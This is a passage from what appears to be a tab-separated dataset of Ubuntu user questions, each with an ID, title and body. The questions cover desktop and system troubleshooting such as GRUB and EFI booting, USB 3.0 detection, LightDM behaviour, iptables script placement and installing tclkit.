tclkit ok ... first i thought there is an ubuntu package for this tclkit , but could n't find one ; and so ended up doing this : $ wget http : //tclkit.googlecode.com/files/tclkit-8.5.9-linux-ix86.gz $ gzip -d tclkit-*.gz $ chmod +x tclkit-8.5.9-linux-ix86 $ sudo ln -s $ ( readlink -f ./tclkit-8.5.9-linux-ix86 ) /usr/bin/ $ which tclkit /usr/bin/tclkit $ $ wget http : //tclkit.googlecode.com/files/sdx-20110317.kit $ chmod +x sdx-20110317.kit $ sudo ln -s $ ( readlink -f ./sdx-20110317.kit ) /usr/bin/sdx.kit $ which sdx.kit /usr/bin/sdx.kit $ tclkit sdx.kit could n't read file `` sdx.kit '' : no such file or directory $ tclkit $ ( which sdx.kit ) specify one of the following commands : addtoc eval fetch ftpd httpd httpdist ls lsk md5sum mkinfo mkpack mkshow mksplit mkzipkit qwrap ratarx rexecd starsync sync tgz2kit treetime unwrap update version wrap for more information , type : /usr/bin/sdx.kit help ? command ? $ tclkit visual_regexp-3.1.tcl 0 invalid command name `` toplevel '' while executing '' toplevel .history '' ( procedure `` regexp : :history : init '' line 5 ) invoked from within '' regexp : :history : init '' ( file `` visual_regexp-3.1.tcl '' line 1510 ) $ wish8.4 visual_regexp-3.1.tcl error in startup script : ca n't find package starkit while executing '' package require starkit '' ( file `` visual_regexp-3.1.tcl '' line 1 ) $ tclsh visual_regexp-3.1.tcl ca n't find package starkit while executing '' package require starkit '' ( file `` visual_regexp-3.1.tcl '' line 1 ) so , apparently i got tclkit and sdx.kit running - but still i can not visual_regexp-3.1.tcl to run ? how do i get to run this on ubuntu ?
208344	how to get 12.04 's login screen ( lightdm ) to display the shutdown menu like 10.04 when the computer 's physical power button is pressed ?	in ubuntu 10.04 while at the login screen ( gdm ) , when the computer 's physical power button was pressed a screen popped up that offered options on shutting down the system ( shutdown , restart , cancel , ... ) along with a 60 second countdown that when elapsed would shutdown the computer . this is useful if you have a system that you use mainly as a server and occasionally as a desktop . when used as a server , one could press the computer 's physical power button and 60 seconds later the system powered down , is there a way turn this behavior on or emulate it in lightdm ? or is it a bug acpi events to shutdown/reboot do n't generate a popup like after logging in ? i found a work around , use pc 's power button while screen is locked . however this is more heavy handed that what i am looking for . it shuts down the system immediately after the computer 's physical power button is pressed in all cases , logged in or not . it also does not give the option to abort the pending shutdown in the case the computer 's power button was pressed accidentally .
208345	dircolors/ls not being displayed correctly under ntfs drive	i 've been messing around with the colours of the files under the .dircolor file , and it worked perfectly under the linux folders . but whenever i try to ls to a ntfs folder all files are displayed under the green colour despite they are different type of files and of course different of the ones i set up in the .dircolor . i 've already searched the whole file with the colour number and got no clue ... do i have to edit .bashrc or .dircolor to make them take into account those ntfs mounted drives ? thanks for your time
208346	ubuntu 12.10 shows no launcher or menu	i have 'upgraded ' to ubuntu 12.10 from a previous nice version that always worked . i have installed from a cd downloaded from this site . i start the pc ( hp pavillion zv5200 ) and arrive at a signon screen which has my username and `` guest '' . this screen shows the menu at the top with power , time , calendar , etc . so i enter my password and i am taken to a screen which only shows a wallpaper , nothing else . if i move the mouse and 'push ' against the left limit i do not get a launcher app . nothing . the only thing that works is opening a terminal ( ctrl+alt+f1 ) . i have tried several of the hot-key combinations i 've read about on the site but none do anything , nothing happens . can anyone help ? thanks very much !
208347	can i uninstall seahorse from ubuntu 12.10 without side effects ?	i find ubuntu ( 12.10 ) 's seahorse intrusive and annoying and i would like to remove it using ubuntu software center . if i do so , could it potentially cause me problems with future ubuntu upgrades ?
208350	gedit 's save empty file dialog i never opened	every time you open a text file in the file manager ( dolphin ) it automatically open a blank document at the same time . the problem with that is that when i close the file it then asks to save the blank document it opened . so every time i just wanted to just view a text file i have to go through the do you want to save changes to `` untitled document 1 '' dance . sure i can re-associate text file to launch in another editor but this must be a problem that can surely be fixed . saw nothing in the preferences so it seems i might be stuck with the issue .
208353	blkid encrypted partition to get uuid	partition is created with : cryptsetup -y create tmp1 /dev/sdc3 sudo blkid /dev/sdc3 gives nothing and partition sdc3 can not be mounted . am i rigth that partition created with cryptsetup create can not have uuid before it is mounted in unencrypted state by `` cryptsetup open '' . do i need to create partition as luks by c
208358	installing gnome breaks seamless mode	i am working on ubuntu with virtualbox ( on my mac ) . i have just installed gnome , and it broke a lot of features , among wich the very nice feature of seamless mode . how can i retrieve it ?
208359	audio is working , but the speaker test does n't work	i 've installed ubuntu 12.04 lts from a minimal cd on a netbook ( asus 1001 pxd ) . i 've installed the ubuntu-desktop package using the -- no-install-recommends option . everything works fine , except the `` sound test '' for headphones or analog speakers . clicking on the `` test '' buttons ( front left and front right ) i do n't hear any sound . despite this , the audio is working properly . i 've checked the audio levels with alsamixer ; i have also checked that the test sounds actually exist in /usr/share/sounds/alsa . i tried an installation of ubuntu 12.04 lts made with the desktop-cd , and in this case the speaker test works properly . i suppose , therefore , that the problem could depend on the lack of a package , but i have not identified which one .
208363	can not run word2007 on wine 1.4 / ubuntu 12.10	after a fresh install of ubuntu 12.10 and wine 1.4 ( all from ubuntu repositories ) and after installing ms-office 2007 , when starting word , beside the word itself , another window running office setup comes up saying that something else needs to be configured . has anyone seen such a thing ?
208366	disappearing indicator-icons	i 've been having some weird troubles with indicator icons . i 'm using 12.10 , but this has been happening since 11.04 came out . two applications , skype and jungledisk , have little icons that sit in the system tray in the top right corner of the screen . i have added them to the system-tray whitelist in dconf-editor , so they do show up , at least initially . the problem is that both icons disappear sometimes . this happens even when the applications are open with a visible window - the icon just disappears from the tray . the apps still work , they send notifications , etc , but the icons are gone . it 's especially annoying with jungledisk , because once the icon disappears , the only way to interact with the program is to kill it manually , then relaunch , and open the window before the icon disappears . here 's the strange thing : if i open the dash , or hit super-s to expose all of the workspaces , you can see the icons again . screenshot with super-s : and screenshot while dash is open : while the dash is open , the icons in question seem to be sort of hidden by the panel . anybody run into this before , or have any thoughts on how to fix ?
208367	usb 3.0 problem on hp probook 6570b with ubuntu 12.10	i have a problem enabling usb 3.0 on my laptop some relevant info : uname -a linux hp-probook-6570b 3.5.0-17-generic # 28-ubuntu smp tue oct 9 19:31:23 utc 2012 x86_64 x86_64 x86_64 gnu/linux lspci -nnk 00:14.0 usb controller [ 0c03 ] : intel corporation 7 series/c210 series chipset family usb xhci host controller [ 8086:1e31 ] ( rev 04 ) subsystem : hewlett-packard company device [ 103c:17ab ] 00:1a.0 usb controller [ 0c03 ] : intel corporation 7 series/c210 series chipset family usb enhanced host controller # 2 [ 8086:1e2d ] ( rev 04 ) subsystem : hewlett-packard company device [ 103c:17ab ] kernel driver in use : ehci_hcd 00:1d.0 usb controller [ 0c03 ] : intel corporation 7 series/c210 series chipset family usb enhanced host controller # 1 [ 8086:1e26 ] ( rev 04 ) subsystem : hewlett-packard company device [ 103c:17ab ] kernel driver in use : ehci_hcd ... lsusb bus 001 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 003 : id 138a:003d validity sensors , inc . bus 001 device 004 : id 0461:4dfe primax electronics , ltd bus 002 device 003 : id 0a5c:21e1 broadcom corp. dmesg [ 1.152273 ] usb usb1 : > serialnumber : 0000:00:1a.0 [ 1.152342 ] hub 1-0:1.0 : > usb hub found [ 1.152345 ] hub 1-0:1.0 : > 2 ports detected [ 1.152396 ] ehci_hcd 0000:00:1d.0 : > setting latency timer to 64 [ 1.152399 ] ehci_hcd 0000:00:1d.0 : > ehci host controller [ 1.152402 ] ehci_hcd 0000:00:1d.0 : > new usb bus registered , assigned bus number 2 [ 1.152419 ] ehci_hcd 0000:00:1d.0 : > debug port 2 [ 1.156304 ] ehci_hcd 0000:00:1d.0 : > cache line size of 64 is not supported [ 1.156307 ] ehci_hcd 0000:00:1d.0 : > irq 16 , io mem 0xd4738000 [ 1.168203 ] ehci_hcd 0000:00:1d.0 : > usb 2.0 started , ehci 1.00 [ 1.168225 ] usb usb2 : > new usb device found , idvendor=1d6b , idproduct=0002 [ 1.168228 ] usb usb2 : > new usb device strings : mfr=3 , product=2 , serialnumber=1 [ 1.168231 ] usb usb2 : > product : ehci host controller [ 1.168247 ] usb usb2 : > manufacturer : linux 3.5.0-17-generic ehci_hcd [ 1.168248 ] usb usb2 : > serialnumber : 0000:00:1d.0 [ 1.168309 ] hub 2-0:1.0 : > usb hub found [ 1.168311 ] hub 2-0:1.0 : > 2 ports detected [ 1.168347 ] ohci_hcd : usb 1.1 'open ' host controller ( ohci ) driver [ 1.168356 ] uhci_hcd : usb universal host controller interface driver [ 1.168374 ] xhci_hcd 0000:00:14.0 : > ca n't derive routing for pci int a [ 1.168375 ] xhci_hcd 0000:00:14.0 : > pci int a : no gsi [ 1.168375 ] [ 1.168391 ] xhci_hcd 0000:00:14.0 : > setting latency timer to 64 [ 1.168394 ] xhci_hcd 0000:00:14.0 : > xhci host controller [ 1.168397 ] xhci_hcd 0000:00:14.0 : > new usb bus registered , assigned bus number 3 [ 1.168479 ] xhci_hcd 0000:00:14.0 : > cache line size of 64 is not supported [ 1.168480 ] xhci_hcd 0000:00:14.0 : > request interrupt 255 failed [ 1.168482 ] xhci_hcd 0000:00:14.0 : > usb bus 3 deregistered [ 1.168493 ] xhci_hcd 0000:00:14.0 : > ca n't derive routing for pci int a [ 1.168495 ] xhci_hcd 0000:00:14.0 : > init 0000:00:14.0 fail , -22 [ 1.168498 ] xhci_hcd : probe of 0000:00:14.0 failed with error -22 [ 1.168517 ] usbcore : registered new interface driver libusual one more thing this laptop runs in natve uefi mode any idea how to solve this problem ?
208371	grub2 loopback booting ubuntu alternate iso	i am trying to set up a multi-boot usb stick including both standard desktop and alternate isos . i have both kinds of isos booting , using examples from a variety of places including https : //help.ubuntu.com/community/grub2/isoboot , and the standard install is working fine . the alternate install is not , however . it boots , runs through the language and keyboard configuration questions , pops up a brief `` detecting hardware '' dialog , and then reports : detect and mount cd-rom your installation cd-rom could n't be mounted . this probably means that the cd-rom was not in the drive . if so you can insert it and try again . retry mounting the cd-rom ? where can i go from here ? my grub2 menu entry reads : menuentry `` ubuntu 12.04.1 alternate i386 '' { iso= '' /boot/ubuntu-12.04.1-alternate-i386.iso '' loopback loop $ iso linux ( loop ) /install/vmlinuz boot=casper persistent iso-scan/filename= $ iso noeject noprompt -- initrd ( loop ) /install/initrd.gz }
208373	using xmonad configuaration on ubuntu 12.04	i 'd like to use this xmonad configuration on ubuntu 12.04 . i followed the installing requirements on ubuntu linux section from the above link and installed dependencies that are n't mentioned : sudo apt-get install rxvt gnome-panel . after logout , i chose gnome with xmonad and xmonad starts , but it does n't look the same way as in the link above . for example , alt+p does n't start dmenu and instead of xmonad status bar with numbered workspaces , the usual ubuntu taskbar shows up . what 's the correct way to use the linked configuration on ubuntu 12.04 ?
208375	how to change alt+tab application switcher in 12.10	default alt+tab application switcher is slow . previously faster ones could be used through ccsm but the options seem to be gone . any way to re-enable them ?
208378	how do i copy files that need root access with scp ?	i have an ubuntu server to which i am connecting using ssh . i need to upload files from my machine into /var/www/ on the server , the files in /var/www/ are owned by root . using putty , after i log in , i have to type sudo su and my password first in order to be able to modify files in /var/www/ . but when i am copying files using winscp , i ca n't create create/modify files in /var/www/ , because the user i 'm connecting with does not have permissions on files in /var/www/ and i ca n't say sudo su as i do in case of an ssh session . do you know how i could deal with this ? if i was working on my local machine , i would call gksudo nautilus but in this case i only have terminal access to the machine .
208385	reboot without actually shutting down	is it possible to do a reboot , without actually rebooting ? i have ksplice , have n't had the chance to use it yet , but need something different . my desktop only will boot into the hd if i enter the bios during boot and tell it to boot from usb then it will boot to the hd , very odd and i have checked my bios and set it to default settings in case i may have changed something , but that did not solve it . so basically i do not want to do an actual shutdown/reboot . i added my brother mfc-295cn and changed the script needed to scan but now i need to reboot to make it work . this is non kernel related so ksplice will not do . is there any other way ? would restarting lighdm do the trick ? is it possible ? thank you for your time and answers
208386	grub2 ( actually burg ) ca n't see partitions on gpt external hdd	i found a sata drive , a semi-broken hdd power supply and an esata cable lying around , so i decided to install arch on it . so i have sda which has the mbr and grub2 ( burg ) and then another hdd ( below ) . burg is installed under ubuntu 12.10 . the drive is formatted with a gpt . here is parted 's output : ( parted ) print model : ata maxtor stm316081 ( scsi ) disk /dev/sdd : 160gb sector size ( logical/physical ) : 512b/512b partition table : gpt number start end size file system name flags 1 1049kb 3146kb 2097kb bios_grub 2 3146kb 21,5gb 21,5gb ext4 3 21,5gb 160gb 139gb ext4 grub legacy told me during the arch install that a 2mb partition ( partition 1 above ) is required for gpt drives . it does n't seem to have a filesystem so i ca n't mount it . now i am trying to chainload arch 's grub from grub2 because i could never really get os-prober to work properly with anything . this is the grub2 menuentry in burg.cfg : menuentry `` arch linux ( esata hdd , usually /dev/sdd ) '' -- class arch -- class os { insmod ext2 set root= ' ( hd3,2 ) ' set os_boot_config='/boot/grub/grub.cfg' multiboot /boot/grub/i386-pc/core.img } the first problem here is that , as far as grub2 is concerned , ( hd3,2 ) does n't exist . ls in the grub2 console gives ( hd0 , msdos1 ) ( hd2 ) ( hd3 ) . in other words , grub2 ca n't see the partitions on sdd . what can i do about this ? the second problem is that grub legacy claims to have installed core.img to the partition 1 ( without a filesystem ) . i do n't know how to mount that , so i am using core.img from the root partition . i have no idea if this is correct , should i change this ?
208392	when will the unity greeter begin to look like the propositions from the design team ?	the canonical design team gave a rather beautiful login screen mockup for the unity greeter . these designs , in my opinion far exceed the current ui that we have for quantal ( which i think is worse , apart from remote login ) , and i was led to beleive that these were the official guidelines for the greeter . are there plans to implement these designs into the unity greeter ? the proposal is here : https : //docs.google.com/a/canonical.com/document/d/1ypvxcsmwnkkmzawit-0r6ulnbtxoa-xoyb0zncknmsg/edit ? pli=1 the mockups are here : https : //docs.google.com/a/canonical.com/file/d/0bzp7juf4tdpqs3jcwmthtmr6ovk/edit ? pli=1
208393	unable to locate package sqlite3	i am trying to run sudo apt-get install libsqlite3-dev but i 'm getting this error : e : unable to locate package sqlite3 how can i fix this ?
208399	xubuntu 12.10 free disk space item in panel	in xubuntu 12.04 there was an item for the panel that allowed to monitor free disk space on different media . i have upgraded ( doing a reinstall ) to xubuntu 12.10 and i can not find that item anymore . is there a similar item that i can add to the panel ?
208401	maas vs uc , whats the diference ?	i was reading ubuntu server documentation , the virtualization part , about uc , ando also found about maas , is uc the same as maas ? could somebody please explain me the diference ? regards
208403	webapps do n't open correctly when using chromium	i have just installed ubuntu 12.10 completely fresh , the old version of ubuntu was discarded or overwritten ( or whatever you call it ) . i want to use the ubuntu webapps with chromium but i 've had several problems . } the first problem is that chromium wo n't ask me if i want to install a webapp if i go to a supported site ( and i do n't already have the webapp installed ) . the second problem is that when i install the webapp by visiting the site in firefox , and then i try to open it in chromium , ubuntu will open a completely new chromium icon and window in the launcher , and the icon will be labeled `` untitled '' ; also there is no search bar in the new window , only the tab at the top . i 've tried using several webapps with firefox set as the default browser and they work as expected : once the webapp icon is clicked a firefox window is opened on the firefox launcher icon , and the window has 'new tab ' button and search bar .
208405	how to efi install ubuntu ?	on trying to install ubuntu 12.10 desktop amd64 to a desktop pc using a ga a75 ud4h motherboard ( which is using an amd 3870k apu with a new 1tb hdd ) following the advice in the motherboard manual and https : //help.ubuntu.com/community/uefi have now got to grub option screen for efi install . booting live dvd in efi mode gives `` secure boot is not enabled '' just before grub kernel option list shows . if the option to `` install ubuntu '' or `` try ubuntu without installing '' is selected gives `` can not read cd/0 '' and `` the kernel must be loaded first '' errors . using dvd or usb installation media gives same results and there has never been at any point an uefi entry in bios/firmware settings or boot device list/s . it might be helpful to say that have had an alternative non-linux os installing efi mode on this hardware giving a gpt installation automagically using usb installation media when the hdd space was completely unallocated space . the usb device was listed under hard drives in bios/firmware one time boot list and did not have an uefi entry . i.e . it installed efi although no efi or uefi entry was assigned to the device like what is shown in many tutorials regarding uefi installs . the only constructive information regarding this question is found at wiki.ubuntu.com/efibootloaders and rodsbooks.com/gb-hybrid-efi but can not work out the answer . checking md5sum and sha256 checksums on downloaded .iso and used `` check disk for defects '' to check burned .iso when booting dvd in bios mode . no errors found . `` check disk for defects '' will not run ( or any other options ) when dvd booted in efi mode . due to trying different distributions as well as older and newer flavours of ubuntu all giving similar results in that no options from grub option screen in efi mode are bootable ( if getting that far ) as well as spending time searching ubuntu forums have come to conclusion the firmware on this system is hardcoded to handle microsoft efi files only . after installing windows efi mode here is a boot info script and here is a link to a thread i started at ubuntu forums which may be helpful to others building a dual boot system . installing bios mode and using boot-repair to install grub-efi is not a complete solution due to the inability of using installation media efi mode for recovery and maintenance due to the `` you need to load kernel first '' and `` can not read cd/files '' errors as described when trying to boot installation media using efi . secure boot is not an issue . using msinfo32 from windows confirms secure boot is not supported on this hardware . how to edit kernel or load kernel for efi install ? = how to efi install ubuntu ? please consider : this is not a dupe ! the linked question that is indicated to having a working answer does not have a working answer to `` # # # how to edit kernel or load kernel for efi install ? = how to efi install ubuntu ? '' therefor the workaround of installing using bios then manually install grub-efi without renaming bootloaders which works to get ubuntu booting using efi or using boot-repair to do this ( and many unnecessary `` fixes '' if recommended repair is not changed in advanced settings ) also works . this goes some way to confirming hardcoding of firmware is not stopping grub the boot manager seeing the vmlinuz.efi files in /casper on dvd . i would like an answer to this so would like this question to be reopened .
208406	how can i install ubuntu on mac os x lion ?	i would like to install ubuntu in a mac with os x lion . can anyone tell me how it can be done ? thx . o .
208408	how to install the blue stripes animated wallpaper in ubuntu 12.10	how can i install the default gnome-shell 3.4 animated background ( or 'wallpaper ' ) in ubuntu 12.10 ? the background is dynamic , becoming brighter and more radiant during the day , and dark and shadowy in the evening . morning , daytime and night i tried to install the package `` gnome-backgrounds '' but there are only the static backgrounds .
208409	unable to record audio from laptop mic xubuntu 12.04	amixer settings are all unmuted and 100 % . i 'm not really even sure where else to look for this . my sound works otherwise .
208410	web apps install problem in 12.04 64bit installation	i just did : sudo add-apt-repository ppa : webapps/preview sudo apt-get update sudo apt-get dist-upgrade sudo apt-get install unity-webapps-preview and get the following message : reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : unity-webapps-preview : depends : xul-ext-unity but it is not going to be installed depends : xul-ext-websites-integration but it is not going to be installed depends : xul-ext-webaccounts but it is not going to be installed e : unable to correct problems , you have held broken packages . what is wrong ?
208417	how to change boot priority ?	i have a laptop with ubuntu installed as the only os . i also have a usb stick with a windows 7 installation on it . i want to install windows from the usb stick on my laptop but when i try to restart the laptop to get access to bios , i ca n't seem to find the command for it , its like it skips everything and just says ubuntu and then takes me to the login screen . how do i change the boot priority to usb in ubuntu ?
208419	detect 5 finger gestures	i 've owned several lenovo x-series tablets . each of these have touchscreens that support only two simultaneous input points , but windows is able to recognize up to 5 finger gestures ( e.g . 5-finger pinch to lock , 4 finger tap to start the application switcher , 4-finger drag to switch applications , etc . ) i 've played around with touchegg , but it does n't seem to be able to detect anything more than two-finger gestures . what trick is being used to accomplish this on windows ? how might i go about implementing something similar for linux ? other info : x reports the touchscreen as a wacom isdv4 e6 finger device .
208426	iptables script	what is the proper place to start/stop iptables script ? currently i have placed it into /etc/init.d and it has start/stop options . however i do n't think it is the best place . the other two according to my research are /etc/network/interface - > pre-up /etc/network/if-*.d ( will this one call my script with start/stop argument ? ) so where is the proper place ?
208428	keyboard character @ in wrong location	after loading 12.10 found keyboard character @ was not shift+2 . shift+2 displays `` . i did not have this problem with the same keyboard in 12.04 version . how can i change the @ to the correct location on my keyboard ?
208431	failed to load module `` canberra-gtk-module ''	today i installed : ubuntu 12.04 oracle jdk 7 and 8 intellij 11.1.4 i setup my java_home path to point to jdk 7 . when i run intellij i get this message : gtk-message : failed to load module `` canberra-gtk-module '' is this a problem or can i over look this ?
208434	flash/swf editor for ubuntu 12.10	first , thank you in advance for any help that you can give a recent transplant from windows to ubuntu . i have a question that i have been seeking the answer too but i draw a blank at every turn . i design websites , free of charge , for nonprofit organizations that are just starting and do not have the resources to hire a design firm . i am in need of a flash/swf editor and compiler . i had a program that i used with the awful previous o/s , however wine would not run the program . thank you in advance for any help that you can offer . since i do not earn a dime for doing this , i would prefer if the program was open source , however any suggestions are greatly appreciated .
208437	ubuntu 12.10 detecting wrong graphics card	i have just done a fresh install of 12.10 on my laptop details are below and it is detecting the wrong graphics cards so now the fan is running very loud . if any could help me i would be very thankful hp pavilion dv6-6b05tx entertainment notebook pc2nd generation intel ( r ) core ( tm ) i7-2670m processor ( 2.2ghz , dual core , 4t , 6mb l3 ) 8gb ddr3 ram 750gb sata hdd blu-ray rom dvd+/-r/rw supermulti dl drive 15.6 inch ( 1920 x 1080 ) led backlit brightview display ati radeon hd 6770m ( 2 gb dedicated )
209438	how do i make english ( united states ) the default language in firefox ?	when i am typing in a text box within firefox , the spell checker uses english ( united kingdom ) by default . i would like to change this to english ( united states ) . here is what i have tried already : within a text box i have right-clicked and selected `` english ( united states ) '' . this works but only on a per-session basis . i want english ( united states ) to be the default when i run firefox . i have gone to about : config within firefox to check the value of `` spellchecker.dictionary '' . the value is `` en_us '' . i have gone to settings > language support and put `` english ( united states ) '' at the top . i have read the file /etc/default/locale ; all the values begin `` en_us '' . i am using firefox version 16.0.2 .
209444	is gnome 3 is slow or my machine ?	i have dell xps 15 i7 - 2360 with nvidia 525m ( 1gb ) with optimus running ubuntu 12.10 64 bit and have bumblebee installed for optimus . recently i installed gnome shell to give it a try and found it sort of lagging under few scenarios though rest all is butter smooth . when i click on date gnome 3 it appears as if a second has elapsed before the window is drawn . but others panel items like network or volume looks fine . in gnome 3 when i 'm on dash with ( window preview ) if i remove any of the windows before the remaining windows reshuffle it takes about 2 seconds ( noticeable clearly ) . everything else is fine in both unity and gnome shell . what is causing this slowness ? is gnome shell is really slower ?
209445	manually edit terminal command history	my terminal history has hundreds of command , but i just want to keep a few of them is there a way to manually edit the list of command executed in the terminal ?
209449	is there a way to batch export svgs to pngs ?	i have these svgs and i 'd like to export them to png images , i could export them with inkscape but that would mean open each file and export that file to png which is not efficient ( i have hundreds of them ) . how can i do this ?
209451	mouse stuck after updating 12.04	i applied a large number of updates to ubuntu 12.04 ( if someone would tell me how to get a list of the applied patches , and i would be happy to post it here ) , and my mouse refuses to move . how can i fix this issue , or at least revert the updates so that my functionality is restored ? note : ubuntu is running under hyper-v on a win 8 host .
209454	can not connect to ethernet port	i 'm running ubuntu 12.04 lte . i 'm trying to connect via ethernet for the first time but have had no success . ifconfig eth0 returns : eth0 link encap : ethernet hwaddr : 00:01:2e:3f : f1 : a0 inet6 addr : fe80 : :201:2eff : fe3f : f1a0 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:68 errors:0 dropped:0 overruns:0 frame:0 tx packets:183 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:8374 ( 8.3 kb ) tx bytes:42944 ( 42.9kb ) interrupt:16 base address:0x6c00 /etc/network/interfaces has auto lo iface lo inef loopback auto eth0 iface eth0 inet dhcp sudo /etc/init.d/networking prints : * running /etc/init.d/networking restart is deprecated because it may not enable again some interfaces * reconfiguring network interfaces ... failed to bring up eth0 [ ok ]
209455	have windows key ( meta ) trigger gnome-do instead of unity dash ( 12.04 )	on my laptop the unity dash often launches really slowly . i might press the windows button , and sometimes it will take up to 15 seconds to open , and the system becomes unresponsive during this time . this is especially likely if i have n't opened the launcher in a few hours . i have gnome-do installed , and i currently launch it with `` ctrl + space '' , and it launches instantly and is very responsive . i would like to swap my shortcut keys , so meta ( the windows key ) launches gnome do , but i ca n't figure out where to change the keyboard shortcut for the dash . any clues ?
209460	xbmc using a lot of cpu when fullscreen	i 'm just starting to try out xbmc ( from the ubuntu repo ) and noticed that it 's using a lot of cpu when running fullscreen , even when i 'm not playing a movie . there 's a definite lag even on the home page with the scrolling footer . i 've toggled the option to use it in windowed mode and it seems to be a lot more responsive . the footer lag seems to be gone . does anyone know why this is happening ? i would have thought that running fullscreen would have used less resources .
209462	ubuntu 12.10 ubuntu-guest and virtualbox ( windows ) host	the internet connection on the windows guest is not working . it is set on nat . incidentally this was working on 12.04 .
209465	installing windows 8 alongside with windows 7 and ubuntu 12.04	i installed ubuntu a long time ago from windows 7 with wubi . i want to give windows 8 a try but at the same time i do n't want to screw up the setup i have , and i still want to keep windows 7 . so my question is , will there be a problem if i install windows 8 ?
209466	unable to install grub in /dev/sda on raid drives	i 'm trying to install 12.04lts on a server but keep running into the unable to install grub error like so `` unable to install grub in /dev/sda '' . the drives are in raid1 and i 'm using fakeraid on a supermicro motherboard , which according to the manual is fully supported . i 've tried installing both from usb and cd-r but still no luck . i 'm not dual booting with any other os , just using 2x320gb drives and have been choosing to install using the entire disk . any ideas what i 'm doing wrong or can do to fix this ? thanks
209471	is there a way to create an installation cd instead of a dvd ?	is there also a way to create an installation cd instead of a dvd for the latest version of ubuntu 12.10 ?
209472	dual installation of windows with ubuntu on uefi duet system	i have a sony vaio laptop which has a bios enabled motherboard . i recently bought an ssd . i was using arch and ubuntu with windows 7 on my 320gb hdd before that and would prefer doing the same after installing the new ssd . i wanted to use guid partition table ( gpt ) on my ssd for the reason that it supports more than just 4 partitions . ( i was thinking may be i can install later some other oses as well ) . i went through the guide of rodsbooks . so , i made some partitions and these are reflected as sudo gdisk /dev/sda gpt fdisk ( gdisk ) version 0.8.1 partition table scan : mbr : protective bsd : not present apm : not present gpt : present found valid gpt with protective mbr ; using gpt . command ( ? for help ) : p disk /dev/sda : 500118192 sectors , 238.5 gib logical sector size : 512 bytes disk identifier ( guid ) : 2c8e0936-465f-4be2-b8d5-ca10a0c408c4 partition table holds up to 128 entries first usable sector is 34 , last usable sector is 500118158 partitions will be aligned on 1-sector boundaries total free space is 2014 sectors ( 1007.0 kib ) number start ( sector ) end ( sector ) size code name 1 2048 1075199 524.0 mib ef00 2 1075200 1077247 1024.0 kib ef02 3 1077248 1339391 128.0 mib 0c01 4 1339392 127168511 60.0 gib 0700 5 127168512 169111551 20.0 gib 8300 6 169111552 211054591 20.0 gib 8300 7 211054592 251054592 19.1 gib 0700 8 251054593 500118158 118.8 gib 0700 till here , i was happy with windows 7 x64 installation . then i proceeded to install arch x64 and ubuntu 12.04 x64 ( which i later upgraded to 12.10 ) . ubuntu installed grub and now i can not boot to windows any more . moreover , it also does not recognize the arch linux partition either , which i think i installed successfully . i tried the solution by jarondl in here but not to much help . questions : how i can i direct my ubuntu ( and/or arch ) to install kernels on /dev/sda1 ? can i install refind on my system ? can i upgrade my windows 7 to windows 8 or do a fresh install of windows 8 , will that create a problem ?
209476	how to completely remove ubuntu 12.04 lts from a windows 7 dualboot ?	i have installed ubuntu 12.04 lts from a usb flash-drive , it was very fine . but now i 'm missing my games that i had on windows 7 . my question is : how do i remove ubuntu 12.04 lts from my windows 7 laptop : ) i hope you can help me .
209478	external 1tb wd usb 3.0 hdd is not detecting . working perfectly find in windows	my 1tb usb 3.0 was working fine earlier in ubuntu as well as windows . but lately it is not at all being detected in ubuntu . it still works fine in windows . i did update my ubuntu to 12.10 but i am not sure if that caused the issue . when i connect my hdd and run dmesg | tail : [ 47.804676 ] usb 4-3 : > device not responding to set address . [ 48.008575 ] usb 4-3 : > device not responding to set address . [ 48.212421 ] usb 4-3 : > device not accepting address 9 , error -71 [ 48.324451 ] usb 4-3 : > device not responding to set address . [ 48.528340 ] usb 4-3 : > device not responding to set address . [ 48.732165 ] usb 4-3 : > device not accepting address 10 , error -71 [ 48.844138 ] usb 4-3 : > device not responding to set address . [ 49.048179 ] usb 4-3 : > device not responding to set address . [ 49.251881 ] usb 4-3 : > device not accepting address 11 , error -71 [ 49.251907 ] hub 4-0:1.0 : > unable to enumerate usb device on port 3 the output of sudo fdisk -l is : disk /dev/sda : 1000.2 gb , 1000204886016 bytes 255 heads , 63 sectors/track , 121601 cylinders , total 1953525168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x00030cde device boot start end blocks id system /dev/sda1 2048 1332981759 666489856 83 linux /dev/sda2 1332981760 1953523711 310270976 5 extended /dev/sda5 1332983808 1349365759 8190976 82 linux swap / solaris /dev/sda6 1349367808 1953523711 302077952 7 hpfs/ntfs/exfat disk /dev/sdb : 120.0 gb , 120034123776 bytes 255 heads , 63 sectors/track , 14593 cylinders , total 234441648 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x000a2519 device boot start end blocks id system /dev/sdb1 * 2048 103368703 51683328 7 hpfs/ntfs/exfat /dev/sdb2 103368704 154568703 25600000 83 linux /dev/sdb3 154568704 234440703 39936000 7 hpfs/ntfs/exfat /dev/sda and /dev/sdb are my 2 internal hdds . but the external one which should be /dev/sdc is not even being shown though it is connected and the led on the hdd is glowing . someone had suggested adding blacklist uas to /etc/modprobe.d/blacklist.conf . tried that as well . but still not working . can someone help me out .
209487	how to setup live ubuntu server ?	i have set up my ubuntu server on virtualbox and now i want to take it live . i 've registered a free domain ( my dot tk domain , for testing purposes before i purchase the real deal ) but now it requires forward url ... . do i use my external ( public ) ip address or what ? and what do i set up in my router â is there a particular port that i should open , for example ? i am really a newbie at all this . please help . thanks ! my server : ip address : 192.168.0.33 broadcast address : 192.168.0.255
